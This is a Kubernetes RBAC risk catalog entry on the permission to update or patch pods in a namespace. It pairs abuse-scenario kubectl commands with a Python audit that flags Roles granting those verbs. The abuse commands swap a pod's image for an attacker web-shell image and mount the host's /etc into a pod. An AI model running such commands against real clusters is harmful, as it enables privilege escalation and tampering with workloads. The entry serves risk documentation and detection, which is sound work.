Update/Patch pods in a namespace
Elevation of Privilege
High
Overview
| Field | Value |
|---|---|
| ID | 1009 |
| Name | Update/Patch pods in a namespace |
| Risk Category | Elevation of Privilege |
| Risk Level | High |
| Role Type | Role |
| API Groups | core |
| Resources | pods |
| Risky Verb Combinations | [update] · [patch] |
| Tags | PotentialPrivilegeEscalation · Tampering · WorkloadExecution |
Description
Allows modifying existing pods within a specific namespace. This can be used to escalate privileges by changing a pod’s configuration to run with higher permissions, execute arbitrary code, or tamper with application behavior within that namespace.
Abuse Scenarios
- Patch a running pod in the namespace to change its container image.

  ```shell
  kubectl set image pod/<pod-name> <container-name>=<malicious-image> -n <namespace>
  # Example: kubectl set image pod/my-web-app web=attacker/web-shell -n dev
  ```

- Patch a running pod to add a hostPath volume mount (if not blocked by PSP/PSA).

  ```shell
  kubectl patch pod <pod-name> -n <namespace> --type='json' -p='[{"op": "add", "path": "/spec/volumes/-", "value": {"name": "host-path-vol", "hostPath": {"path": "/etc"}}}, {"op": "add", "path": "/spec/containers/0/volumeMounts/-", "value": {"name": "host-path-vol", "mountPath": "/mnt/host-etc"}}]'
  # Example: kubectl patch pod my-app -n default --type='json' -p='[{"op": "add", "path": "/spec/volumes/-", "value": {"name": "host-path-vol", "hostPath": {"path": "/etc"}}}, {"op": "add", "path": "/spec/containers/0/volumeMounts/-", "value": {"name": "host-path-vol", "mountPath": "/mnt/host-etc"}}]'
  ```
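Added here as an example of the detection side, not part of this catalog entry: a small Python audit that flags Role objects granting the risky update/patch verbs above on core-group pods, honouring the `*` wildcard in apiGroups, resources and verbs (a broad namespace-admin Role is the usual place this grant hides). The Role objects are constructed samples; the `_grants`, `find_pod_mutation_grants` and `audit` names are this example's own.

```python
"""Audit Kubernetes Role objects for risk 1009: update/patch on core-group pods."""

RISKY_VERBS = {"update", "patch"}

def _grants(allowed, wanted):
    """True if an RBAC rule list covers `wanted`, honouring the '*' wildcard."""
    return "*" in allowed or wanted in allowed

def find_pod_mutation_grants(role):
    """Return the sorted risky verbs a Role grants on core-group pods.
    A rule matches when apiGroups include "" (core) or "*", resources include
    "pods" or "*", and verbs include update, patch or "*". Subresources such as
    pods/exec are distinct resources and deliberately do not match."""
    found = set()
    for rule in role.get("rules", []):
        if not _grants(rule.get("apiGroups", []), ""):
            continue
        if not _grants(rule.get("resources", []), "pods"):
            continue
        verbs = set(rule.get("verbs", []))
        found |= RISKY_VERBS if "*" in verbs else verbs & RISKY_VERBS
    return sorted(found)

def audit(roles):
    """Map "namespace/name" to the risky verbs for every Role that grants any."""
    findings = {}
    for role in roles:
        verbs = find_pod_mutation_grants(role)
        if verbs:
            meta = role["metadata"]
            findings[f"{meta.get('namespace', 'cluster')}/{meta['name']}"] = verbs
    return findings

# Constructed sample Roles for demonstration; not taken from any real cluster.
SAMPLE_ROLES = [
    {"kind": "Role", "metadata": {"name": "pod-editor", "namespace": "dev"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "patch"]}]},
    {"kind": "Role", "metadata": {"name": "ns-admin", "namespace": "dev"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"kind": "Role", "metadata": {"name": "pod-reader", "namespace": "prod"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "watch"]}]},
    {"kind": "Role", "metadata": {"name": "exec-only", "namespace": "prod"},
     "rules": [{"apiGroups": [""], "resources": ["pods/exec"], "verbs": ["create", "update"]}]},
    {"kind": "Role", "metadata": {"name": "deploy-editor", "namespace": "prod"},
     "rules": [{"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["patch"]}]},
]
```

Running `audit(SAMPLE_ROLES)` reports only `dev/pod-editor` (patch) and `dev/ns-admin` (patch, update); on a live cluster the same function can be fed the `items` of `kubectl get roles -A -o json`.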